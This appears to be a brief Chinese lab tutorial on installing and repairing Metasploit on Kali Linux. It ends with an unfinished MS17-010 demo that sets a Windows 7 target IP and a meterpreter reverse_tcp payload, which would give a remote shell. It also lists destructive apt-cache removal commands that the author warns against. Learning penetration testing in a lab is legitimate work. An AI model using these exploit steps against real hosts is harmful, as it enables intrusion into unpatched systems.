msf 背景
- Msfconsole:是一個(gè)一體化集中控制臺(tái),允許你訪問(wèn)到幾乎所有的MSF框架選項(xiàng)
metasploit就是一個(gè)免費(fèi)的漏洞框架,利用他人人都是黑客,使用者不需要任何編程基礎(chǔ)就可以使用
msf沒(méi)有更新 1926的滲透攻擊數(shù)

更新源
命令:
root@kali:~# vi /etc/apt/sources.list
- vi編輯器當(dāng)中的使用:“ i ”插入添加,esc鍵退出,“:wq”保存并退出。
編輯輸入以下源:
- kali官方源
deb http://http.kali.org/ kali-rolling main non-free contrib
deb-src http://http.kali.org/ kali-rolling main non-free contrib
- 中科大源
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
添加數(shù)字簽名
wget archive.kali.org/archive-key.asc //下載簽名(因?yàn)橹锌频脑磌ail不識(shí)別,所以一定要加入簽名)
apt-key add archive-key.asc //安裝簽名

注:如果添加數(shù)字簽名還提示無(wú)法安裝可刪除原有msf
root@kali:~# apt remove metasploit-framework
注:卸載過(guò)程中無(wú)法獲得鎖/var/cache/apt/archives/lock - open (11:資源暫時(shí)不可用)
無(wú)法對(duì)目錄/var/cache/apt/archives/加鎖
root@kali:~# sudo rm /var/cache/apt/archives/lock //進(jìn)行強(qiáng)制解鎖
root@kali:~# sudo rm /var/cache/apt/archives/
以上操作不要做,可能報(bào)錯(cuò)需要重裝kail的問(wèn)題!
安裝msf框架
root@bogon:~# apt-get update //更新框架

root@kali:~# apt-get install metasploit-framework//安裝msf框架

如下界面選yes

如果出現(xiàn)如下報(bào)錯(cuò)用一下命令解決:

注意:如果更新完msf出現(xiàn)才下問(wèn)題
root@kaliew:~# msfconsole
[*] Bundler failed to load and returned this error:
'cannot load such file -- bundler/setup'
[*] You may need to uninstall or upgrade bundler
解決方法:
root@kaliew:~# sudo gem install bundler
root@kaliew:~# bundle update celluloid
root@kali:~# systemctl start postgresql //啟動(dòng)數(shù)據(jù)庫(kù)
root@kali:~# systemctl enable postgresql //允許開(kāi)機(jī)自啟動(dòng)
root@kali:~# msfdb init //構(gòu)建數(shù)據(jù)庫(kù)緩存
root@kali:~#msfconsole
ms17-010案例演示
search ms17-010 --- 查詢ms17-010
use 2 --- 使用第二條漏洞

set RHOST 192.168.1.123 ---win7環(huán)境ip
設(shè)置目標(biāo)主機(jī)的IP地址為192.168.1.119 ---kail環(huán)境ip
set payload windows/x64/meterpreter/reverse_tcp ---設(shè)置payload
show options ---查看需要配置的參數(shù)


新增用戶同步


